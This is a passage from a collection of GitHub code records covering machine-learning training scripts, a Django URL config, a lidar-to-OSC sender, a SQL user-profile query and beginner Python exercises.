:\n\t\tlastaccuracy = forward('Validation', validationloader, model)\n\n\tif args['save'] :\n\t\ttorch.save(model, 'C:\\\\Users\\\\Frank\\\\Machine Learning\\\\DLSR\\\\weight\\\\' + args['save'])\n\n\tfor epoch in range(args['epoch']): # loop over the dataset multiple times\n\n\t\tprint('\\n\\tEpoch : ' + str(epoch))\n\n\t\tmodel.train()\n\t\tforward('Training', trainloader, model, criterion, optimizer)\n\n\t\tmodel.eval()\n\t\twith torch.no_grad() :\n\t\t\taccuracy = forward('Validation', validationloader, model)\n\n\t\tif args['save'] and accuracy > lastaccuracy:\n\t\t\tlastaccuracy = accuracy\n\t\t\ttorch.save(model, 'C:\\\\Users\\\\Frank\\\\Machine Learning\\\\DLSR\\\\weight\\\\' + args['save'])\n\n\tprint('Testing :')\n\n\tif args['save'] :\n\t\tdel model\n\t\tmodel = torch.load('C:\\\\Users\\\\Frank\\\\Machine Learning\\\\DLSR\\\\weight\\\\' + args['save'])\n\n\tmodel.eval()\n\twith torch.no_grad() :\n\t\tforward('Test', testloader, model)","repo_name":"FrankLu007/Deep-Learning-Systems-and-Realization","sub_path":"DLSR_lab2_0516310/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9030791387","text":"class Vertex:\n \"\"\"\n Represent a single vertex which is a single point in world space that has a\n specific material, shader type, normal and (u, v) coordinate for the\n texture.\n\n Args:\n position(numpy.array): Position in world coordinates\n material(Material): The material to be rendered for this vertex\n shader_type(string): The type of shader to use for this vertex\n n(numpy.array): The vector normal at this vertex\n u(float): Value for u texture coordinate at this vertex\n v(float): Value for u texture coordinate at this vertex\n \"\"\"\n def __init__(\n self, position,\n material=None,\n shader_type=None,\n n=None,\n u=None,\n v=None\n ):\n self.position = position\n self.material = material\n self.shader_type = shader_type\n self.n = n\n self.u = u\n self.v = v","repo_name":"HenrYxZ/sombra","sub_path":"vertex.py","file_name":"vertex.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"54"} +{"seq_id":"37549361628","text":"import gym\nimport time\n\nenv = gym.make(\"Breakout-v0\")\n\nprint(env.observation_space.shape)\nprint(env.action_space)\n\nenv.reset()\nenv.render()\n\nwhile True:\n act = int(input('type action'))\n print(env.step(act))\n env.render()\n","repo_name":"safijari/rl-tutorials","sub_path":"gym_tests/test_breakout.py","file_name":"test_breakout.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"2554347385","text":"\nimport sys\nimport os\nimport copy\nimport math\nimport subprocess\nfrom collections import OrderedDict\nimport pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\nimport random\nimport torch\nimport torch.nn as nn\nfrom lightgbm import LGBMClassifier\n\n#Initialise the random seeds\ndef random_init(**kwargs):\n random.seed(kwargs['seed'])\n np.random.seed(kwargs['seed'])\n torch.manual_seed(kwargs['seed'])\n torch.cuda.manual_seed(kwargs['seed'])\n torch.backends.cudnn.deterministic = True\n \ndef normalise_data(df):\n df.loc[df['Pclass'].isna(),'Pclass'] = 0\n df.loc[df['Sex'].isna(),'Sex'] = '*'\n df.loc[df['Age'].isna(),'Age'] = -1\n df.loc[df['SibSp'].isna(),'SibSp'] = -1\n df.loc[df['Parch'].isna(),'Parch'] = -1\n df.loc[df['Embarked'].isna(),'Embarked'] = '*'\n df.loc[df['Fare'].isna(),'Fare'] = -1\n df.loc[df['Ticket'].isna(),'Ticket'] = -1\n df['Ticket'] = [''.join(c for c in t if c.isdigit()) if str(t)==t else str(t) for t in df['Ticket']]\n df['Ticket'] = [int(t) if len(t)>0 else -1 for t in df['Ticket']]\n df['Name'] = [normalise_name(n) for n in df['Name']]\n return df\n\n#Normalise the text and reorder names and surnames\ndef normalise_name(text):\n text = text.upper()\n text = ' '.join(text.split(',')[::-1])\n text = text.strip()\n return text\n \ndef load_tree_data(df,target=False,**kwargs):\n num_samples = len(df)\n sample_size = len(args['cat_feats']) + len(args['num_feats'])\n dataset = np.zeros((num_samples,sample_size))\n idx = 0\n for c in args['cat_feats']:\n dataset[:,idx] = np.array([args['categories'][c][v] if v in args['categories'][c] else len(args['categories'][c]) for v in df[c]])\n idx += 1\n for n in args['num_feats']:\n dataset[:,idx] = np.array(df[n])\n idx += 1\n if target:\n targets = np.array(df['Survived'])\n else:\n targets = None\n \n return dataset, targets\n\n#Read the existing characters\ndef read_vocabulary(train_text, **kwargs):\n vocab = dict()\n counts = dict()\n num_words = 0\n for line in train_text:\n line = (list(line.strip()) if kwargs['characters'] else line.strip().split())\n for char in line:\n if char not in vocab:\n vocab[char] = num_words\n counts[char] = 0\n num_words+=1\n counts[char] += 1\n num_words = 0\n vocab2 = dict()\n if not kwargs['characters']:\n for w in vocab:\n if counts[w] >= args['min_count']:\n vocab2[w] = num_words\n num_words += 1\n vocab = vocab2\n for word in [kwargs['start_token'],kwargs['end_token'],kwargs['unk_token']]:\n if word not in vocab:\n vocab[word] = num_words\n num_words += 1\n return vocab\n\n#Load the data into torch tensors\ndef load_data(text, targets=None, randomize=False, **kwargs):\n num_seq = len(text)\n max_words = max([len((list(line.strip()) if kwargs['characters'] else line.strip().split())) for line in text])+2\n dataset = len(kwargs['vocab'])*torch.ones((max_words,num_seq),dtype=torch.long)\n labels = torch.zeros((num_seq),dtype=torch.uint8)\n idx = 0\n utoken_value = kwargs['vocab'][kwargs['unk_token']]\n for i,line in tqdm(enumerate(text),desc='Allocating data memory',disable=(kwargs['verbose']<2)):\n words = (list(line.strip()) if kwargs['characters'] else line.strip().split())\n if len(words)==0 or words[0] != kwargs['start_token']:\n words.insert(0,kwargs['start_token'])\n if words[-1] != kwargs['end_token']:\n words.append(kwargs['end_token'])\n for jdx,word in enumerate(words):\n dataset[jdx,idx] = kwargs['vocab'].get(word,utoken_value)\n if targets is not None:\n labels[idx] = targets[i]\n idx += 1\n \n if randomize:\n idx = [i for i in range(dataset.shape[1])]\n random.shuffle(idx)\n dataset = dataset[:,idx]\n labels = labels[idx]\n \n return dataset, labels\n\n#Class for a LSTM encoder\nclass LSTMEncoder(nn.Module):\n def __init__(self, **kwargs):\n \n super(LSTMEncoder, self).__init__()\n #Base variables\n self.vocab = kwargs['vocab']\n self.in_dim = len(self.vocab)\n self.start_token = kwargs['start_token']\n self.end_token = kwargs['end_token']\n self.unk_token = kwargs['unk_token']\n self.characters = kwargs['characters']\n self.embed_dim = kwargs['embedding_size']\n self.hid_dim = kwargs['hidden_size']\n self.n_layers = kwargs['num_layers']\n \n #Define the embedding layer\n self.embed = nn.Embedding(self.in_dim+1,self.embed_dim,padding_idx=self.in_dim)\n #Define the lstm layer\n self.lstm = nn.LSTM(input_size=self.embed_dim,hidden_size=self.hid_dim,num_layers=self.n_layers)\n \n def forward(self, inputs, lengths):\n #Inputs are size (LxBx1)\n #Forward embedding layer\n emb = self.embed(inputs)\n #Embeddings are size (LxBxself.embed_dim)\n\n #Pack the sequences for GRU\n packed = torch.nn.utils.rnn.pack_padded_sequence(emb, lengths)\n #Forward the GRU\n packed_rec, self.hidden = self.lstm(packed,self.hidden)\n #Unpack the sequences\n rec, _ = torch.nn.utils.rnn.pad_packed_sequence(packed_rec)\n #Hidden outputs are size (LxBxself.hidden_size)\n \n #Get last embeddings\n out = rec[lengths-1,list(range(rec.shape[1])),:]\n #Outputs are size (Bxself.hid_dim)\n \n return out\n \n def init_hidden(self, bsz):\n #Initialise the hidden state\n weight = next(self.parameters())\n self.hidden = (weight.new_zeros(self.n_layers, bsz, self.hid_dim),weight.new_zeros(self.n_layers, bsz, self.hid_dim))\n\n def detach_hidden(self):\n #Detach the hidden state\n self.hidden=(self.hidden[0].detach(),self.hidden[1].detach())\n\n def cpu_hidden(self):\n #Set the hidden state to CPU\n self.hidden=(self.hidden[0].detach().cpu(),self.hidden[1].detach().cpu())\n\n#Class for an MLP predictor\nclass Predictor(nn.Module):\n def __init__(self, **kwargs):\n \n super(Predictor, self).__init__()\n self.hid_dim = kwargs['hidden_size']\n self.out_dim = 2\n #Define the output layer and softmax\n self.linear = nn.Linear(self.hid_dim,self.out_dim)\n self.softmax = nn.LogSoftmax(dim=1)\n \n def forward(self,inputs):\n #Outputs are size (Bxself.hid_dim)\n out = self.softmax(self.linear(inputs))\n return out\n\n#Train one epoch of the model\ndef train_model(trainset,trainlabels,encoder,predictor,optimizer,criterion,**kwargs):\n trainlen = trainset.shape[1]\n nbatches = math.ceil(trainlen/kwargs['batch_size'])\n total_loss = 0\n total_backs = 0\n with tqdm(total=nbatches,disable=(kwargs['verbose']<2)) as pbar:\n encoder = encoder.train()\n for b in range(nbatches):\n #Data batch\n X = trainset[:,b*kwargs['batch_size']:min(trainlen,(b+1)*kwargs['batch_size'])].clone().long().to(kwargs['device'])\n Y = trainlabels[b*kwargs['batch_size']:min(trainlen,(b+1)*kwargs['batch_size'])].clone().long().to(kwargs['device'])\n mask = torch.clamp(len(kwargs['vocab'])-X,max=1)\n seq_length = torch.sum(mask,dim=0)\n ordered_seq_length, dec_index = seq_length.sort(descending=True)\n max_seq_length = torch.max(seq_length)\n X = X[:,dec_index]\n Y = Y[dec_index]\n X = X[0:max_seq_length]\n #Forward pass\n encoder.init_hidden(X.size(1))\n embeddings = encoder(X,ordered_seq_length.cpu())\n posteriors = predictor(embeddings)\n loss = criterion(posteriors,Y)\n #Backpropagate\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n #Estimate the latest loss\n if total_backs == 100:\n total_loss = total_loss*0.99+loss.detach().cpu().numpy()\n else:\n total_loss += loss.detach().cpu().numpy()\n total_backs += 1\n encoder.detach_hidden()\n pbar.set_description(f'Training epoch. Loss {total_loss/(total_backs+1):.2f}')\n pbar.update()\n return total_loss/(total_backs+1)\n\n#Get predictions from a model\ndef evaluate_model(testset,encoder,predictor,**kwargs):\n testlen = testset.shape[1]\n nbatches = math.ceil(testlen/kwargs['batch_size'])\n predictions = np.zeros((testlen,))\n with torch.no_grad():\n encoder = encoder.eval()\n for b in range(nbatches):\n #Data batch\n X = testset[:,b*kwargs['batch_size']:min(testlen,(b+1)*kwargs['batch_size'])].clone().long().to(kwargs['device'])\n mask = torch.clamp(len(kwargs['vocab'])-X,max=1)\n seq_length = torch.sum(mask,dim=0)\n ordered_seq_length, dec_index = seq_length.sort(descending=True)\n max_seq_length = torch.max(seq_length)\n X = X[:,dec_index]\n X = X[0:max_seq_length]\n #Forward pass\n encoder.init_hidden(X.size(1))\n embeddings = encoder(X,ordered_seq_length.cpu())\n posteriors = predictor(embeddings)\n estimated = posteriors[:,1]#torch.argmax(posteriors,dim=1)\n rev_dec_index = list(range(estimated.shape[0]))\n for i,j in enumerate(dec_index):\n rev_dec_index[j] = i\n predictions[b*kwargs['batch_size']:min(testlen,(b+1)*kwargs['batch_size'])] = np.exp(estimated[rev_dec_index].detach().cpu().numpy())\n return predictions\n\n\ndef compute_results(predictions,labels):\n if predictions.ndim == 2:\n predictions = predictions[:,1]\n thresholds = np.arange(1.0,-0.00001,-0.001)\n fpr = []\n tpr = []\n acc = []\n for th in thresholds:\n tp = np.sum((predictions >= th) * labels)\n tn = np.sum((predictions < th) * (1-labels))\n fp = np.sum((predictions >= th) * (1-labels))\n fn = np.sum((predictions < th) * labels)\n tpr.append(tp/(tp+fn))\n fpr.append(fp/(tn+fp))\n acc.append((tp+tn)/(tp+tn+fp+fn))\n results = pd.DataFrame({'thresholds':thresholds,'tpr':tpr,'fpr':fpr,'acc':acc})\n return results\n \nargs = {\n 'cv_percentage': 0.1,\n 'seed': 0,\n 'num_leaves': 90,\n 'max_depth': 30,\n 'learning_rate': 0.1,\n 'n_estimators': 200,\n }\n\nprint('Training LightGBM')\nrandom_init(**args)\n\ntrain_data = normalise_data(pd.read_csv('../input/tabular-playground-series-apr-2021/train.csv'))\ntrain_data = train_data.sample(frac=1).reset_index(drop=True)\nvalid_data = train_data.iloc[-int(len(train_data)*args['cv_percentage']):]\ntrain_data = train_data.iloc[:-int(len(train_data)*args['cv_percentage'])]\ntest_data = normalise_data(pd.read_csv('../input/tabular-playground-series-apr-2021/test.csv'))\nargs['cat_feats'] = ['Pclass','Sex','Embarked']\nargs['num_feats'] = ['Age','SibSp','Parch','Ticket','Fare']\nargs['categories'] = {c: {a:i for i,a in enumerate(np.unique(train_data[c]))} for c in args['cat_feats']}\ntrainset, traintargets = load_tree_data(train_data,target=True,**args)\nvalidset, validtargets = load_tree_data(valid_data,target=True,**args)\nargs['num_mean'] = np.mean(trainset[:,len(args['cat_feats']):],axis=0)\nargs['num_std'] = np.std(trainset[:,len(args['cat_feats']):],axis=0)\ntestset, _ = load_tree_data(test_data,target=False,**args)\n\ntrainset[:,len(args['cat_feats']):] -= args['num_mean']\ntrainset[:,len(args['cat_feats']):] /= args['num_std']\nvalidset[:,len(args['cat_feats']):] -= args['num_mean']\nvalidset[:,len(args['cat_feats']):] /= args['num_std']\ntestset[:,len(args['cat_feats']):] -= args['num_mean']\ntestset[:,len(args['cat_feats']):] /= args['num_std']\n\nlgb = LGBMClassifier(num_leaves=args['num_leaves'],max_depth=args['max_depth'],learning_rate=args['learning_rate'],n_estimators=args['n_estimators'],objective=\"binary\")\nlgb.fit(trainset,traintargets)\nval_pred_lgb = lgb.predict_proba(validset)[:,1]\ntest_pred_lgb = lgb.predict_proba(testset)[:,1]\nresults = compute_results(val_pred_lgb,validtargets)\nth = results.loc[results['acc']==np.max(results['acc'])]['thresholds'].values[0]\nacc = 100*results.loc[results['acc']==np.max(results['acc'])]['acc'].values[0]\nauc = np.trapz(results['tpr'],x=results['fpr'])\npos = 100*sum(test_pred_lgb >= th)/test_pred_lgb.shape[0]\nprint('Validation AUC: {0:.3f}, validation accuracy: {1:.2f}%@{2:.3f}, test survival rate: {3:.2f}%'.format(auc,acc,th,pos))\n\nprint('Training LSTM name encoder')\nargs = {\n 'input_file': None,\n 'vocabulary': None,\n 'cv_percentage': 0.1,\n 'epochs': 20,\n 'batch_size': 32,\n 'embedding_size': 16,\n 'hidden_size': 64,\n 'num_layers': 1,\n 'learning_rate': 0.001,\n 'seed': 0,\n 'start_token': '*s*',\n 'end_token': '*\\s*',\n 'unk_token': '*UNK*',\n 'verbose': 1,\n 'characters': True,\n 'min_count': 1,\n 'device': torch.device(('cuda:0' if torch.cuda.is_available() else 'cpu'))\n }\n\n#Read data\nrandom_init(**args)\ntrain_text = train_data.Name.values\nvalid_text = valid_data.Name.values\ntrain_targets = train_data.Survived.values\nvalid_targets = valid_data.Survived.values\ntest_text = test_data.Name.values\n\n#Basic stats\nprint('Training: {0:d} names. Validation: {1:d}. Evaluation: {2:d} names'.format(len(train_text),len(valid_text),len(test_text)))\nprint('{0:.2f}% of the training set are survival examples'.format(100*sum(train_targets)/len(train_text)))\n\n#Make vocabulary and load data\nargs['vocab'] = read_vocabulary(train_text, **args)\ntrainset, trainlabels = load_data(train_text, train_targets, randomize=True, **args)\nvalidset, validlabels = load_data(valid_text, valid_targets, randomize=False, **args)\ntestset, _ = load_data(test_text, None, randomize=False, **args)\n\n#Create model, optimiser and criterion\nencoder = LSTMEncoder(**args).to(args['device'])\npredictor = Predictor(**args).to(args['device'])\noptimizer = torch.optim.Adam(list(encoder.parameters())+list(predictor.parameters()),lr=args['learning_rate'])\ncriterion = nn.NLLLoss(reduction='mean').to(args['device'])\n\n#Train epochs\nbest_acc = 0.0\nfor ep in range(1,args['epochs']+1):\n loss = train_model(trainset,trainlabels,encoder,predictor,optimizer,criterion,**args)\n val_pred = evaluate_model(validset,encoder,predictor,**args)\n test_pred = evaluate_model(testset,encoder,predictor,**args)\n results = compute_results(val_pred,validlabels.numpy())\n th = results.loc[results['acc']==np.max(results['acc'])]['thresholds'].values[0]\n acc = 100*results.loc[results['acc']==np.max(results['acc'])]['acc'].values[0]\n auc = np.trapz(results['tpr'],x=results['fpr'])\n pos = 100*sum(test_pred >= th)/len(test_text)\n if acc >= best_acc:\n best_results = copy.copy(results)\n best_acc = acc\n best_th = th\n test_pred_lstm = copy.copy(test_pred)\n val_pred_lstm = copy.copy(val_pred)\n print('Epoch: {0:d} of {1:d}. Training loss: {2:.2f}, validation AUC: {3:.3f}, validation accuracy: {4:.2f}%@{5:.3f}, test survival rate: {6:.2f}%'.format(ep,args['epochs'],loss,auc,acc,th,pos))\n\nbest_acc = 0.0\nfor w in np.arange(0.5,0.501,0.05):\n results = compute_results(val_pred_lgb*w+val_pred_lstm*(1-w),validlabels.numpy())\n th = results.loc[results['acc']==np.max(results['acc'])]['thresholds'].values[0]\n acc = 100*results.loc[results['acc']==np.max(results['acc'])]['acc'].values[0]\n auc = np.trapz(results['tpr'],x=results['fpr'])\n pos = 100*sum((test_pred_lgb*w+test_pred_lstm*(1-w)) >= th)/len(test_text)\n if acc >= best_acc:\n best_results = copy.copy(results)\n best_w = w\n best_acc = acc\n best_th = th\n print('Weights ({0:.2f},{1:.2f}), validation AUC: {2:.3f}, validation accuracy: {3:.2f}%@{4:.3f}, test survival rate: {5:.2f}%'.format(w,1-w,auc,acc,th,pos))\n\nout_df = pd.DataFrame(data={'PassengerId':test_data['PassengerId'],'Survived':((test_pred_lgb*best_w+test_pred_lstm*(1-best_w)) >= best_th).astype(int)}).set_index('PassengerId',drop=True)\nout_df.to_csv('submission.csv')\n\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/tabular-playground-series-apr-2021/Oscar/synthetictitanicdata-lightgbm-lstmnameencoder.py","file_name":"synthetictitanicdata-lightgbm-lstmnameencoder.py","file_ext":"py","file_size_in_byte":16132,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"18372575032","text":"from resources.db_queries.connection import db\n\nfrom resources.modules import json_serializable\n\nfrom json import dumps\n\n\ndef get_user_inf(token):\n\n # Данные пользователя\n us_data = db.q_execute(\n '''select \n\t\t\tfu.image,\n\t\t\tfu.user_fio\n\t\tfrom dev.fct_user fu\n\t\twhere \n\t\t\tfu.id_user = cast( '%s' as uniqueidentifier) '''\n % token\n )[0]\n\n # Данные достижений\n us_ach_data = db.q_execute(\n ''' \n\t\tselect top 4\n\t\t\tda.ach_name,\n\t\t\tua.ach_status,\n\t\t\tda.attch_image,\n\t\t\tcast((ua.progress*1.0)/(da.ach_end_point*1.0)*100.0 as int),\n\t\t\tda.ach_desc\n\t\tfrom \n\t\t\tdev.fct_user_achievements ua\n\t\tjoin dev.dim_achievements da \n\t\t\ton da.id_achievement = ua.id_achievement \n\t\twhere ua.id_user = cast( '%s' as uniqueidentifier)\n\t\t'''\n % token\n )\n\n # Данные карты\n us_card_data = db.q_execute(\n '''\n\t\tselect\n\t\t\tfc.acc_num,\n\t\t\tcast(fc.acc_balance as varchar),\n\t\t\tcast(fc.acc_bns_balance as varchar)\n\t\tfrom \t\n\t\t\tdev.fct_cards fc \n\t\twhere fc.id_user = cast( '%s' as uniqueidentifier)\n\t\t'''\n % token\n )[0]\n\n # Данные транзакций\n us_transactions = db.q_execute(\n '''\n\t\tselect\n\t\t\t'Пополнение' tp,\n\t\t\t'Умная карта' org,\n\t\t\tcast(fcr.transaction_sum as varchar),\n\t\t\tconvert(varchar, fcr.transaction_dttm, 103)\n\t\tfrom \n\t\t\tdev.fct_cards fc \n\t\tleft join dev.fct_card_replenishment fcr\n\t\t\ton fc.id_card = fcr.id_card\n\t\twhere fc.id_user = cast( '%s' as uniqueidentifier)\n\t\tunion all \n\t\tselect\n\t\t\t'Списание' tp,\n\t\t\tfo.org_name ,\n\t\t\tcast(fwo.transaction_sum as varchar),\n\t\t\tconvert(varchar, fwo.transaction_dttm, 103) \n\t\tfrom \n\t\t\tdev.fct_cards fc \n\t\tleft join dev.fct_write_offs fwo \n\t\t\ton fc.id_card = fwo.id_card\n\t\tleft join dev.fct_organizations fo \n\t\t\ton fwo.id_organization = fo.id_organization \n\t\twhere fc.id_user = cast( '%s' as uniqueidentifier)\n\t\t'''\n % (token, token)\n )\n\n rspns = json_serializable('json')\n\n rspns.add_features('img', us_data[0])\n rspns.add_features('fio', us_data[1])\n rspns.add_feature_list('achievments')\n rspns.add_features('card', {\n 'number': us_card_data[0], 'balance': us_card_data[1], \"bonuce\": us_card_data[2]})\n # dat.add_feature_list('events')\n rspns.add_feature_list('subscribes')\n rspns.add_feature_list('transaction')\n\n for item in us_ach_data:\n rspns.data[0]['achievments'].append(\n {'name': item[0], 'status': item[1], 'img': item[2], 'progressbar': item[3], \"tooltip\": item[4]})\n\n rspns.data[0]['subscribes'].append(\n {'name': 'dad', 'img': 'https://sun1-84.userapi.com/s/v1/if1/9Kq86zbwk3njs6BgBuY9fRSVgr-enaUwuQX2kHIUC4nfDMd8XkA51s8FxBka-TNG4ew29is0.jpg?size=100x0&quality=96&crop=0,420,1320,1320&ava=1', 'content': 'kekw', 'adress': 'kekw', 'link': 'штош'})\n\n for item in us_transactions:\n rspns.data[0]['transaction'].append(\n {'type': item[0], 'recipient': item[1], 'value': item[2], 'data': item[3]})\n\n return dumps(rspns.data[0])\n","repo_name":"cringeburger/smart-city-backend","sub_path":"resources/db_queries/user_profile_inf.py","file_name":"user_profile_inf.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2447791103","text":"players = [ #list of player dictionaries\n {\n \t\"name\": \"Kevin Durant\", \n \t\"age\":34, \n \t\"position\": \"small forward\", \n \t\"team\": \"Brooklyn Nets\"\n },\n {\n \t\"name\": \"Jason Tatum\", \n \t\"age\":24, \n \t\"position\": \"small forward\", \n \t\"team\": \"Boston Celtics\"\n },\n {\n \t\"name\": \"Kyrie Irving\", \n \t\"age\":32, \"position\": \"Point Guard\", \n \t\"team\": \"Brooklyn Nets\"\n },\n {\n \t\"name\": \"Damian Lillard\", \n \t\"age\":33, \"position\": \"Point Guard\", \n \t\"team\": \"Portland Trailblazers\"\n },\n {\n \t\"name\": \"Joel Embiid\", \n \t\"age\":32, \"position\": \"Power Foward\", \n \t\"team\": \"Philidelphia 76ers\"\n },\n {\n \t\"name\": \"\", \n \t\"age\":16, \n \t\"position\": \"P\", \n \t\"team\": \"en\"\n }\n]\n\n############################################ CHALLENGE 1 ############################################\nclass Player:\n def __init__(self, player): #removed individual args. inserted dict variable\n self.name = player[\"name\"] #assigned all Player object attributes by using dictionary keys\n self.age = player[\"age\"]\n self.position = player[\"position\"]\n self.team = player[\"team\"]\n\n ############### NINJA BONUS ###############\n @classmethod\n def get_team(cls, team_list):\n team = []\n for player in team_list:\n team.append(cls(player))\n return team\n\n#testing class method with these lines\ncls_method_team = Player.get_team(players) \nprint(len(cls_method_team))\n\n############################################ CHALLENGE 2 ############################################\nkevin = {\n \t\"name\": \"Kevin Durant\", \n \t\"age\":34, \n \t\"position\": \"small forward\", \n \t\"team\": \"Brooklyn Nets\"\n}\njason = {\n \t\"name\": \"Jason Tatum\", \n \t\"age\":24, \n \t\"position\": \"small forward\", \n \t\"team\": \"Boston Celtics\"\n}\nkyrie = {\n \t\"name\": \"Kyrie Irving\", \n \t\"age\":32, \"position\": \"Point Guard\", \n \t\"team\": \"Brooklyn Nets\"\n}\n\nplayer_kevin = Player(kevin)\nplayer_jason = Player(jason)\nplayer_kyrie = Player(kyrie)\n\n############################################ CHALLENGE 3 ############################################\nnew_team = []\nfor player in players:\n new_team.append(Player(player))\n","repo_name":"reidroberts24/Python-Fundamentals","sub_path":"fundamentals/oop/basketball_dictionaries.py","file_name":"basketball_dictionaries.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33549280525","text":"\"\"\"\nTitle:\npython_osc_send_v2.py\n\n# Part of the installation for final year project\n#\nDescription:\nRoboPeak Lidar sensor runs to collect\nangle and distance data of reflected objects\nThis is in turn sent to another Raspberry Pi, using Open Sound control\n(OSC)\n\nPart of work for final project\nMA Computational Art\n2018\nVersion 0.2\n\nAuthor:\njames@tregaskis.org\nDate:\nAugust 2018\n\nCredits:\ncode adapted from\nhttps://pypi.org/project/python-osc/\nand\nhttps://github.com/SkoltechRobotics/rplidar\n\n\"\"\"\nimport argparse\nimport random\nimport time\nimport sys\n\nfrom rplidar import RPLidar\n\nfrom pythonosc import osc_message_builder\nfrom pythonosc import udp_client\nPORT_NAME = '/dev/ttyUSB0'\n\nlidar = RPLidar(PORT_NAME)\n\nlidar.stop()\nlidar.clear_input()\n\n#Added this delay avoid Lidar throwing Incorrect descriptor me ssage and failing\ntime.sleep(2)\n#################################################################\ninfo = lidar.get_info()\nprint(info)\n\nhealth = lidar.get_health()\nprint(health)\nANGLE=2\nDISTANCE=3\n#2000 prob ok for exhibition, 500 for garage\nIGNORE_REDINGS_BEYOND = 4500\nPORT_FOR_RECEIVING_MACHINE=5005\ntry:\n if __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ip\", default=\"10.10.10.1\",\n help=\"The ip of the OSC server\")\n parser.add_argument(\"--port\", type=int, default=PORT_FOR_RECEIVING_MACHINE,\n help=\"The port the OSC server is listening on\")\n args = parser.parse_args()\n client = udp_client.SimpleUDPClient(args.ip, args.port)\n\n\n distance_old=[None]*361;\n\n distance_new=[None]*361;\n # this is the important part, to send the polar position data to PI no. 2\n for measurment in lidar.iter_measurments():\n # strength of laser, angle of reading, distance\n #print(\"ANGLE \",int(measurment[2]))\n #print(\"DISTANCE\", int(measurmen[3])\n if int(measurment[1]) > 0:\n if int(measurment[DISTANCE]) < IGNORE_REDINGS_BEYOND :\n distance_new[int(measurment[ANGLE])] = int(measurment[DISTANCE])\n if distance_new[int(measurment[ANGLE])] != distance_old[int(measurment[ANGLE])] :\n\n an = int(measurment[ANGLE])\n di = int(distance_new[int(measurment[ANGLE])])\n distance_old[int(measurment[ANGLE])]=distance_new[int(measurment[ANGLE])]\n print(an,di)\n distance_new[int(measurment[ANGLE])]=int(measurment[ANGLE])\n # transmit data using OSC protocol\n client.send_message(\"/st\", [an, di])\n ######################################\n\n time.sleep(1)\nexcept IOError as ioex:\n\tprint (ioex)\n\tpass\nexcept KeyboardInterrupt:\n print('Ctrl-c pressed, Stopping.')\n\nexcept Exception as e: print(e)\nfinally:\n #osc_terminate()\n lidar.stop()\n lidar.disconnect()\n","repo_name":"jtreg/forgiveness_machine","sub_path":"pi_lidar/python/osc/python_osc_send_V2.py","file_name":"python_osc_send_V2.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10891862443","text":"sid = input(\"enter your student id (SID) : \")\nfullname=input(\"enter your name: \")\naddress=input(\"enter your address: \")\nemail=input(\"enter your email: \")\n\nprint(\"SID: {}\".format(sid))\nprint(\"name {}\".format(fullname))\nprint(\"address {}\".format(address))\nprint(\"email {}\".format(email))\n\nsid=None\nsid=1\nsid=3\nsid=878878799\nsid=[1,2.34,345+88,\"pcps\",\"laudu\"]\nsid={1,2.34,345+88,\"pcps\",\"laudu\"}\nsid={\n \"ab\":\"V\",\"lodu\":23}\n\nprint(sid)\nprint(type(sid))\nprint(id(sid))\n\n\n# data types - None,int,float, str,list,tuple,set,dict,boolean\n\n\n#operators -arithmetic\n# +,-,*,/,%,//,**,//\n# int,float,complex, boolean, )( list , tuple ,set, dict, class\n\n#relational\n# >, >= ,<= ,!=, == ,<","repo_name":"CodeWithVaruag/PythonPratice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"122251075","text":"from django.conf.urls import patterns, include, url\nfrom django.views.generic import RedirectView\nfrom portal.feeds import LatestMedia, TorrentFeed, ChannelFeed, ChannelFeedTorrent, CollectionFeed, CollectionFeedTorrent, CommentsFeed\nfrom livestream.feeds import UpcomingEvents\n\nimport lambdaproject.settings as settings\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n url(r'^$', 'portal.views.index'),\n url(r'^favicon\\.ico$', RedirectView.as_view(url='/static/favicon.ico')),\n url(r'^item/(?P[-\\w]+)/$', 'portal.views.detail'),\n url(r'^item/(?P[-\\w]+)/get_duration$', 'portal.views.get_duration'),\n url(r'^tags/(?P[\\w|\\W]+)/$', 'portal.views.tag'),\n url(r'^collection/(?P[-\\w]+)/$', 'portal.views.collection'),\n url(r'^json_tags/(?P[\\w|\\W]+)/$', 'portal.views.tag_json'),\n url(r'^channel/(?P[-\\w]+)/$', 'portal.views.channel_list'),\n url(r'^item/iframe/(?P[-\\w]+)/$', 'portal.views.iframe'),\n url(r'^submittal/(?P\\d+)/$', 'portal.views.submittal'),\n url(r'^search/', 'portal.views.search'),\n url(r'^json_search/', 'portal.views.search_json'),\n url(r'^submit/', 'portal.views.submit'),\n url(r'^thumbnail/', 'portal.views.upload_thumbnail'),\n url(r'^status/', 'portal.views.status'),\n url(r'^p/(?P[-\\w]+)/$', 'pages.views.page'),\n url(r'^stream/$', 'livestream.views.current'),\n url(r'^stream/list/$', 'livestream.views.list_streams'),\n url(r'^stream/(?P[-\\w]+)/$', 'livestream.views.detail'),\n url(r'^login/', 'django.contrib.auth.views.login'),\n url(r'^logout/', 'django.contrib.auth.views.logout', {'next_page': '/'}),\n url(r'^feeds/latest/(?P[-\\w]+)/$', LatestMedia()),\n url(r'^feeds/stream/upcoming', UpcomingEvents()),\n url(r'^feeds/latest/torrent', TorrentFeed()),\n 